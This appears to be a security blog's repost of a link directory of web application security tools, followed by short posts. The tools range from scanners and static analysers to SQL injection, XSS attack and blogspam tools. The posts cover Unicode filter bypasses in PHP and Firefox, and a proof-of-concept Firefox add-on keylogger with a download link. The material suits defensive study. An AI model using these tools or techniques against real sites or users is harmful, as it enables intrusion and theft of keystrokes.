rss-cache – http://www.dubfire.net/chris/projects/rss-cache/
SQL injection scanning
0x90.org: home of Absinthe, Mezcal, etc – http://0x90.org/releases.php
SQLiX – http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project
sqlninja: a SQL Server injection and takeover tool – http://sqlninja.sourceforge.net/
JustinClarke’s SQL Brute – http://www.justinclarke.com/archives/2006/03/sqlbrute.html
BobCat – http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html
sqlmap – http://sqlmap.sourceforge.net/
Scully: SQL Server DB Front-End and Brute-Forcer – http://www.sensepost.com/research/scully/
FG-Injector – http://www.flowgate.net/?lang=en&seccion=herramientas
PRIAMOS – http://www.priamos-project.com/
Web application security malware, backdoors, and evil code
W3AF: Web Application Attack and Audit Framework – http://w3af.sourceforge.net/
Jikto – http://busin3ss.name/jikto-in-the-wild/
XSS Shell – http://ferruh.mavituna.com/article/?1338
XSS-Proxy – http://xss-proxy.sourceforge.net
AttackAPI – http://www.gnucitizen.org/projects/attackapi/
FFsniFF – http://azurit.elbiahosting.sk/ffsniff/
HoneyBlog’s web-based junkyard – http://honeyblog.org/junkyard/web-based/
BeEF – http://www.bindshell.net/tools/beef/
Firefox Extension Scanner (FEX) – http://www.gnucitizen.org/projects/fex/
What is my IP address? – http://reglos.de/myaddress/
xRumer: blogspam automation tool – http://www.botmaster.net/movies/XFull.htm
SpyJax – http://www.merchantos.com/makebeta/tools/spyjax/
Greasecarnaval – http://www.gnucitizen.org/projects/greasecarnaval
Technika – http://www.gnucitizen.org/projects/technika/
Load-AttackAPI bookmarklet – http://www.gnucitizen.org/projects/load-attackapi-bookmarklet
MD’s Projects: JS port scanner, pinger, backdoors, etc – http://michaeldaw.org/my-projects/
Web application services that aid in web application security assessment
Netcraft – http://www.netcraft.net
AboutURL – http://www.abouturl.com/
The Scrutinizer – http://www.scrutinizethis.com/
net.toolkit – http://clez.net/
ServerSniff – http://www.serversniff.net/
Online Microsoft script decoder – http://www.greymagic.com/security/tools/decoder/
Webmaster-Toolkit – http://www.webmaster-toolkit.com/
myIPNeighbors, et al – http://digg.com/security/MyIPNeighbors_Find_Out_Who_Else_is_Hosted_on_Your_Site_s_IP_Address
PHP charset encoding – http://h4k.in/encoding
data: URL testcases – http://h4k.in/dataurl
Browser-based security fuzzing / checking
Zalewski’s MangleMe – http://lcamtuf.coredump.cx/mangleme/mangle.cgi
hdm’s tools: Hamachi, CSSDIE, DOM-Hanoi, AxMan – http://metasploit.com/users/hdm/tools/
Peach Fuzzer Framework – http://peachfuzz.sourceforge.net/
TagBruteForcer – http://research.eeye.com/html/tools/RT20060801-3.html
PROTOS Test-Suite: c05-http-reply – http://www.ee.oulu.fi/research/ouspg/protos/testing/c05/http-reply/index.html
COMRaider – http://labs.idefense.com
bcheck – http://bcheck.scanit.be/bcheck/
Stop-Phishing: Projects page – http://www.indiana.edu/~phishing/?projects
LinkScanner – http://linkscanner.explabs.com/linkscanner/default.asp
BrowserCheck – http://www.heise-security.co.uk/services/browsercheck/
Cross-browser Exploit Tests – http://www.jungsonnstudios.com/cool.php
Stealing information using DNS pinning demo – http://www.jumperz.net/index.php?i=2&a=1&b=7
Javascript Website Login Checker – http://ha.ckers.org/weird/javascript-website-login-checker.html
Mozilla Activex – http://www.iol.ie/~locka/mozilla/mozilla.htm
Jungsonn’s Black Dragon Project – http://blackdragon.jungsonnstudios.com/
Mr. T (Master Recon Tool, includes Read Firefox Settings PoC) – http://ha.ckers.org/mr-t/
Vulnerable Adobe Plugin Detection For UXSS PoC – http://www.0x000000.com/?i=324
About Flash: is your flash up-to-date? – http://www.macromedia.com/software/flash/about/
Test your installation of Java software – http://java.com/en/download/installed.jsp?detect=jre&try=1
WebPageFingerprint – Light-weight Greasemonkey Fuzzer – http://userscripts.org/scripts/show/30285
PHP static analysis and file inclusion scanning
PHP-SAT.org: Static analysis for PHP – http://www.program-transformation.org/PHP/
Unl0ck Research Team: tool for searching in google for include bugs – http://unl0ck.net/tools.php
FIS: File Inclusion Scanner – http://www.segfault.gr/index.php?cat_id=3&cont_id=25
PHPSecAudit – http://developer.spikesource.com/projects/phpsecaudit
PHP Defensive Tools
PHPInfoSec – Check phpinfo configuration for security – http://phpsec.org/projects/phpsecinfo/
A Greasemonkey Replacement can be found at http://yehg.net/lab/#tools.greasemonkey
Php-Brute-Force-Attack Detector – Detect your web servers being scanned by brute force tools such as WFuzz, OWASP DirBuster and vulnerability scanners such as Nessus, Nikto, Acunetix ..etc. http://yehg.net/lab/pr0js/files.php/php_brute_force_detect.zip
PHP-Login-Info-Checker – Strictly enforce admins/users to select stronger passwords. It tests cracking passwords against 4 rules. It also has a built-in smoke test page via url loginfo_checker.php?testlic
http://yehg.net/lab/pr0js/files.php/loginfo_checkerv0.1.zip
http://yehg.net/lab/pr0js/files.php/phploginfo_checker_demo.zip
php-DDOS-Shield – A tricky script to prevent idiot distributed bots which discontinue their flooding attacks by identifying HTTP 503 header code. http://code.google.com/p/ddos-shield/
PHPMySpamFIGHTER – http://yehg.net/lab/pr0js/files.php/phpmyspamfighter.zip http://yehg.net/lab/pr0js/files.php/phpMySpamFighter_demo.rar
Web Application Firewall (WAF) and Intrusion Detection (APIDS) rules and resources
APIDS on Wikipedia – http://en.wikipedia.org/wiki/APIDS
PHP Intrusion Detection System (PHP-IDS) – http://php-ids.org/ http://code.google.com/p/phpids/
dotnetids – http://code.google.com/p/dotnetids/
Secure Science InterScout – http://www.securescience.com/home/newsandevents/news/interscout1.0.html
Remo: whitelist rule editor for mod_security – http://remo.netnea.com/
GotRoot: ModSecurity rules – http://www.gotroot.com/tiki-index.php?page=mod_security+rules
The Web Security Gateway (WSGW) – http://wsgw.sourceforge.net/
mod_security rules generator – http://noeljackson.com/tools/modsecurity/
Mod_Anti_Tamper – http://www.wisec.it/projects.php?id=3
[TGZ] Automatic Rules Generation for Mod_Security – http://www.wisec.it/rdr.php?fn=/Projects/Rule-o-matic.tgz
AQTRONIX WebKnight – http://www.aqtronix.com/?PageID=99
Akismet: blog spam defense – http://akismet.com/
Samoa: Formal tools for securing web services – http://research.microsoft.com/projects/samoa/
Web services enumeration / scanning / fuzzing
WebServiceStudio2.0 – http://www.codeplex.com/WebserviceStudio
Net-square: wsChess – http://net-square.com/wschess/index.shtml
WSFuzzer – http://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project
SIFT: web method search tool – http://www.sift.com.au/73/171/sift-web-method-search-tool.htm
iSecPartners: WSMap, WSBang, etc – http://www.isecpartners.com/tools.html
Web application non-specific static source-code analysis
Pixy: a static analysis tool for detecting XSS vulnerabilities – http://www.seclab.tuwien.ac.at/projects/pixy/
Brixoft.Net: Source Edit – http://www.brixoft.net/prodinfo.asp?id=1
Security compass web application auditing tools (SWAAT) – http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project
An even more complete list here – http://www.cs.cmu.edu/~aldrich/courses/654/tools/
A nice list that claims some demos available – http://www.cs.cmu.edu/~aldrich/courses/413/tools.html
A smaller, but also good list – http://spinroot.com/static/
Yasca: A highly extensible source code analysis framework; incorporates several analysis tools into one package. http://www.yasca.org/
Static analysis for C/C++ (CGI, ISAPI, etc) in web applications
RATS – http://www.securesoftware.com/resources/download_rats.html
ITS4 – http://www.cigital.com/its4/
FlawFinder – http://www.dwheeler.com/flawfinder/
Splint – http://www.splint.org/
Uno – http://spinroot.com/uno/
BOON (Buffer Overrun detectiON) – http://www.cs.berkeley.edu/~daw/boon/ http://boon.sourceforge.net
Valgrind – http://www.valgrind.org/
Java static analysis, security frameworks, and web application security tools
LAPSE – http://suif.stanford.edu/~livshits/work/lapse/
HDIV Struts – http://hdiv.org/
Orizon – http://sourceforge.net/projects/orizon/
FindBugs: Find bugs in Java programs – http://findbugs.sourceforge.net/
PMD – http://pmd.sourceforge.net/
CUTE: A Concolic Unit Testing Engine for C and Java – http://osl.cs.uiuc.edu/~ksen/cute/
EMMA – http://emma.sourceforge.net/
JLint – http://jlint.sourceforge.net/
Java PathFinder – http://javapathfinder.sourceforge.net/
Fujaba: Move between UML and Java source code – http://wwwcs.uni-paderborn.de/cs/fujaba/
Checkstyle – http://checkstyle.sourceforge.net/
Cookie Revolver Security Framework – http://sourceforge.net/projects/cookie-revolver
tinapoc – http://sourceforge.net/projects/tinapoc
jarsigner – http://java.sun.com/j2se/1.5.0/docs/tooldocs/solaris/jarsigner.html
Solex – http://solex.sourceforge.net/
Java Explorer – http://metal.hurlant.com/jexplore/
HTTPClient – http://www.innovation.ch/java/HTTPClient/
another HttpClient – http://jakarta.apache.org/commons/httpclient/
a list of code coverage and analysis tools for Java – http://mythinkpond.blogspot.com/2007/06/java-foss-freeopen-source-software.html
Microsoft .NET static analysis and security framework tools, mostly for ASP.NET and ASP.NET AJAX, but also C# and VB.NET
* Visual Studio 2008 Code Analysis, available in:
  o VSTS 2008 Development Edition (http://msdn.microsoft.com/vsts2008/products/bb933752.aspx) and
  o VSTS 2008 Team Suite (http://msdn.microsoft.com/vsts2008/products/bb933735.aspx)
* Visual Studio 2005 Code Analyzer, available in:
  o Visual Studio 2005 Team Edition for Software Developers (http://msdn.microsoft.com/en-us/vstudio/aa718806.aspx)
  o Visual Studio 2005 Team Suite (http://msdn.microsoft.com/en-us/vstudio/aa718806.aspx)
* Web Development Helper – http://www.nikhilk.net/Project.WebDevHelper.aspx
* FxCop:
  o (blog) http://blogs.msdn.com/fxcop/
  o (download) http://code.msdn.microsoft.com/codeanalysis
* Microsoft internal tools you can’t have yet:
  o http://www.microsoft.com/windows/cse/pa_projects.mspx
  o http://research.microsoft.com/Pex/
  o http://www.owasp.org/images/5/5b/OWASP_IL_7_FuzzGuru.pdf
Threat modeling
Microsoft Threat Analysis and Modeling Tool v2.1 (TAM) – http://www.microsoft.com/downloads/details.aspx?FamilyID=59888078-9daf-4e96-b7d1-944703479451&displaylang=en
Amenaza: Attack Tree Modeling (SecurITree) – http://www.amenaza.com/software.php
Octotrike – http://www.octotrike.org/
Add-ons for Firefox that help with general web application security
Web Developer Toolbar – https://addons.mozilla.org/firefox/60/
Plain Old Webserver (POW) – https://addons.mozilla.org/firefox/3002/
XML Developer Toolbar – https://addons.mozilla.org/firefox/2897/
Public Fox – https://addons.mozilla.org/firefox/3911/
XForms Buddy – http://beaufour.dk/index.php?sec=misc&pagename=xforms
MR Tech Local Install – http://www.mrtech.com/extensions/local_install/
Nightly Tester Tools – http://users.blueprintit.co.uk/~dave/web/firefox/buildid/index.html
IE Tab – https://addons.mozilla.org/firefox/1419/
User-Agent Switcher – https://addons.mozilla.org/firefox/59/
ServerSwitcher – https://addons.mozilla.org/firefox/2409/
HeaderMonitor – https://addons.mozilla.org/firefox/575/
RefControl – https://addons.mozilla.org/firefox/953/
refspoof – https://addons.mozilla.org/firefox/667/
No-Referrer – https://addons.mozilla.org/firefox/1999/
LocationBar^2 – https://addons.mozilla.org/firefox/4014/
SpiderZilla – http://spiderzilla.mozdev.org/
Slogger – https://addons.mozilla.org/en-US/firefox/addon/143
Fire Encrypter – https://addons.mozilla.org/firefox/3208/
Add-ons for Firefox that help with Javascript and Ajax web application security
Selenium IDE – http://www.openqa.org/selenium-ide/
Firebug – http://www.joehewitt.com/software/firebug/
Venkman – http://www.mozilla.org/projects/venkman/
Chickenfoot – http://groups.csail.mit.edu/uid/chickenfoot/
Greasemonkey – http://www.greasespot.net/
Greasemonkey compiler – http://www.letitblog.com/greasemonkey-compiler/
User script compiler – http://arantius.com/misc/greasemonkey/script-compiler
Extension Developer’s Extension (Firefox Add-on) – http://ted.mielczarek.org/code/mozilla/extensiondev/
Smart Middle Click (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/3885/
Bookmarklets that aid in web application security
RSnake’s security bookmarklets – http://ha.ckers.org/bookmarklets.html
BMlets – http://optools.awardspace.com/bmlet.html
Huge list of bookmarklets – http://www.squarefree.com/bookmarklets/
Blummy: consists of small widgets, called blummlets, which make use of Javascript to provide rich functionality – http://www.blummy.com/
Bookmarklets every blogger should have – http://www.micropersuasion.com/2005/10/bookmarklets_ev.html
Flat Bookmark Editing (Firefox Add-on) – http://n01se.net/chouser/proj/mozhack/
OpenBook and Update Bookmark (Firefox Add-ons) – http://www.chuonthis.com/extensions/
SSL certificate checking / scanning
SSL Labs – https://www.ssllabs.com/ssldb/
[ZIP] THCSSLCheck – http://thc.org/root/tools/THCSSLCheck.zip
[ZIP] Foundstone SSLDigger – http://www.foundstone.com/us/resources/termsofuse.asp?file=ssldigger.zip
Cert Viewer Plus (Firefox Add-on) – https://addons.mozilla.org/firefox/1964/
Honeyclients, Web Application, and Web Proxy honeypots
Honeyclient Project: an open-source honeyclient – http://www.honeyclient.org/trac/
HoneyC: the low-interaction honeyclient – http://honeyc.sourceforge.net/
Capture: a high-interaction honeyclient – http://capture-hpc.sourceforge.net/
Google Hack Honeypot – http://ghh.sourceforge.net/
PHP.Hop – PHP Honeynet Project – http://www.rstack.org/phphop/
SpyBye – http://www.monkey.org/~provos/spybye/
Honeytokens – http://www.securityfocus.com/infocus/1713
Blackhat SEO and maybe some whitehat SEO
SearchStatus (Firefox Add-on) – http://www.quirk.biz/searchstatus/
SEO for Firefox (Firefox Add-on) – http://tools.seobook.com/firefox/seo-for-firefox.html
SEOQuake (Firefox Add-on) – http://www.seoquake.com/
Footprinting for web application security
Evolution – http://www.paterva.com/evolution-e.html
GooSweep – http://www.mcgrewsecurity.com/projects/goosweep/
Aura: Google API Utility Tools – http://www.sensepost.com/research/aura/
Edge-Security tools – http://www.edge-security.com/soft.php
Fierce Domain Scanner – http://ha.ckers.org/fierce/
Googlegath – http://www.nothink.org/perl/googlegath/
Advanced Dork (Firefox Add-on) – https://addons.mozilla.org/firefox/2144/
Passive Cache (Firefox Add-on) – https://addons.mozilla.org/firefox/977/
CacheOut! (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1453/
BugMeNot Extension (Firefox Add-on) – http://roachfiend.com/archives/2005/02/07/bugmenot/
TrashMail.net Extension (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1813/
DiggiDig (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/2819/
Digger (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1467/
Database security assessment
Scuba by Imperva Database Vulnerability Scanner – http://www.imperva.com/scuba/
Browser Defenses
DieHard – http://www.diehard-software.org/
LocalRodeo (Firefox Add-on) – http://databasement.net/labs/localrodeo/
NoMoXSS – http://www.seclab.tuwien.ac.at/projects/jstaint/
Request Rodeo – http://savannah.nongnu.org/projects/requestrodeo
FlashBlock (Firefox Add-on) – http://flashblock.mozdev.org/
CookieSafe (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/2497
NoScript (Firefox Add-on) – http://www.noscript.net/
FormFox (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1579/
Adblock (Firefox Add-on) – http://adblock.mozdev.org/
httpOnly in Firefox (Firefox Add-on) – http://blog.php-security.org/archives/40-httpOnly-Cookies-in-Firefox-2.0.html
SafeCache (Firefox Add-on) – http://www.safecache.com/
SafeHistory (Firefox Add-on) – http://www.safehistory.com/
PrefBar (Firefox Add-on) – http://prefbar.mozdev.org/
All-in-One Sidebar (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1027/
QArchive.org web file checker (Firefox Add-on) – https://addons.mozilla.org/firefox/4115/
Update Notified (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/2098/
FireKeeper – http://firekeeper.mozdev.org/
Greasemonkey: XSS Malware Script Detector – http://yehg.net/lab/#tools.greasemonkey
Browser Privacy
TrackMeNot (Firefox Add-on) – https://addons.mozilla.org/firefox/3173/
Privacy Bird – http://www.privacybird.com/
Application and protocol fuzzing (random instead of targeted)
Sulley – http://fuzzing.org/
taof: The Art of Fuzzing – http://sourceforge.net/projects/taof/
zzuf: multipurpose fuzzer – http://sam.zoy.org/zzuf/
autodafé: an act of software torture – http://autodafe.sourceforge.net/
EFS and GPF: Evolutionary Fuzzing System – http://www.appliedsec.com/resources.html
repost src: http://www.owasp.org/index.php/Phoenix/Tools
src: http://owasp.blogspot.com/2009/12/sql-injection-resources.html
The WASC Threat Classification v2.0
by dominee on Jan.04, 2010, under security
The WASC Threat Classification is a cooperative effort to clarify and organize the threats to the security of a web site. The members of the Web Application Security Consortium have created this project to develop and promote industry standard terminology for describing these issues. Application developers, security professionals, software vendors, and compliance auditors will have the ability to access a consistent language and definitions for web security related issues.
ff plugins
by dominee on Jan.03, 2010, under for geeks
JSView 2.0.5
All browsers include a “View Source” option, but none of them offer the ability to view the source code of external files. Most websites store their javascripts and style sheets in external files and then link to them within a web page’s…
https://addons.mozilla.org/sk/firefox/addon/2076
User Agent Switcher 0.7.2
The User Agent Switcher extension adds a menu and a toolbar button to switch the user agent of the browser.
https://addons.mozilla.org/sk/firefox/addon/59
A couple of unicode issues on PHP and Firefox
by dominee on Oct.19, 2009, under Uvahy
1.- Overlong UTF-8:
As REQUIRED by UNICODE 3.1, and noted in the Unicode Technical Report #36, UTF-8 is forbidden to interpret a character’s non-shortest form.
2.- Ill formed sequences:
As REQUIRED by UNICODE 3.0, and noted in the Unicode Technical Report #36, if a leading byte is followed by an invalid successor byte, then it should NOT consume it.
3.- Integer overflow:
Unsigned short has a size of 16 bits (2 bytes), which is INCAPABLE of storing unicode characters of 21 bits, represented in UTF with 4 bytes (1111 0xxx 10xx xxxx 10xx xxxx 10xx xxxx). PHP attempts to add a 21-bit value to a 16-bit variable, and then makes no checks on the value.
The firefox one
Firefox is supposed to consider the non-shortest form exception (point #1 in the PHP vulnerabilities), and section 3.1 of the Unicode Technical Report #36, but apparently there’s a flaw in it. This is especially problematic because an overlong unicode sequence that is not taken into consideration may allow several types of filter bypasses.
http://sirdarckcat.blogspot.com/2009/10/couple-of-unicode-issues-on-php-and.html
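A strict UTF-8 decoder that enforces the three rules listed above (reject overlong forms, do not consume an invalid successor byte, and decode into a 32-bit type so a 21-bit code point cannot wrap a 16-bit variable), as an added example that is not code from the original post, from PHP or from Firefox; the function names and error codes are my own.

```c
/* Strict UTF-8 decoder (added example, not from the original post, PHP or
 * Firefox). Names and error codes are my own. It enforces the three rules
 * above: reject overlong forms, never consume an invalid successor byte, and
 * decode into a 32-bit type so 21-bit code points cannot wrap a 16-bit one. */
#include <stddef.h>
#include <stdint.h>

#define UTF8_OK        0
#define UTF8_OVERLONG  1   /* point 1: non-shortest form such as C0 AF */
#define UTF8_ILLFORMED 2   /* point 2: bad lead byte or bad continuation byte */
#define UTF8_RANGE     3   /* surrogate or above U+10FFFF (needs > 16 bits) */

/* Decode one code point from s[0..len), len >= 1. On success stores it in
 * *cp and sets *used to 1..4. On error *used is 1: only the lead byte is
 * consumed, so the offending successor byte is re-examined as a new lead. */
int utf8_decode_one(const uint8_t *s, size_t len, uint32_t *cp, size_t *used)
{
    uint8_t b = s[0];
    uint32_t v = 0, min = 0;
    size_t need, i;

    *used = 1;
    if (b < 0x80) { *cp = b; return UTF8_OK; }
    if (b >= 0xC0 && b <= 0xDF)      { need = 1; v = b & 0x1F; min = 0x80; }
    else if (b >= 0xE0 && b <= 0xEF) { need = 2; v = b & 0x0F; min = 0x800; }
    else if (b >= 0xF0 && b <= 0xF7) { need = 3; v = b & 0x07; min = 0x10000; }
    else return UTF8_ILLFORMED;      /* stray continuation byte or F8..FF */

    for (i = 1; i <= need; i++) {
        if (i >= len || (s[i] & 0xC0) != 0x80) return UTF8_ILLFORMED;
        v = (v << 6) | (s[i] & 0x3F);
    }
    if (v < min) return UTF8_OVERLONG;       /* C0 AF would decode to '/' */
    if (v > 0x10FFFF || (v >= 0xD800 && v <= 0xDFFF)) return UTF8_RANGE;
    *cp = v;
    *used = need + 1;
    return UTF8_OK;
}

/* Validate a whole buffer: returns UTF8_OK, or the first error found. */
int utf8_validate(const char *s, size_t len)
{
    const uint8_t *p = (const uint8_t *)s;
    size_t i = 0, used;
    uint32_t cp;

    while (i < len) {
        int rc = utf8_decode_one(p + i, len - i, &cp, &used);
        if (rc != UTF8_OK) return rc;
        i += used;
    }
    return UTF8_OK;
}
```

A filter that runs this check before any decoding step cannot be bypassed with the C0 AF form of "/" or with a 4-byte sequence that a 16-bit type would silently truncate.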
yet another webtools
by dominee on Aug.27, 2009, under security
Httpry – HTTP Traffic sniffer
Httpry is a sniffer specializing in HTTP traffic. It is used to log and display HTTP traffic by capturing, parsing and logging it for further analysis.
http://www.lifedork.net/httpry-http-traffic-sniffer.html
http://dumpsterventures.com/jason/httpry/httpry-0.1.5.tar.gz
Firefox Addons own ya – Keylogger POC
My small POC consists of a keylogger written in javascript and embedded into the Firefox browser in the form of an extension. This code can be injected into any known/famous addon without anyone noticing, since it creates no warnings from antivirus software (it’s just legal javascript) and no warning from firewalls, since the logs of the keystrokes are sent through Firefox on port 80 to a malicious server.
http://blogs.hackerscenter.com/2008/04/firefox-addons-threat.html
http://www.hackerscenter.com/public/Firefox_poc/poc_keylogger.zip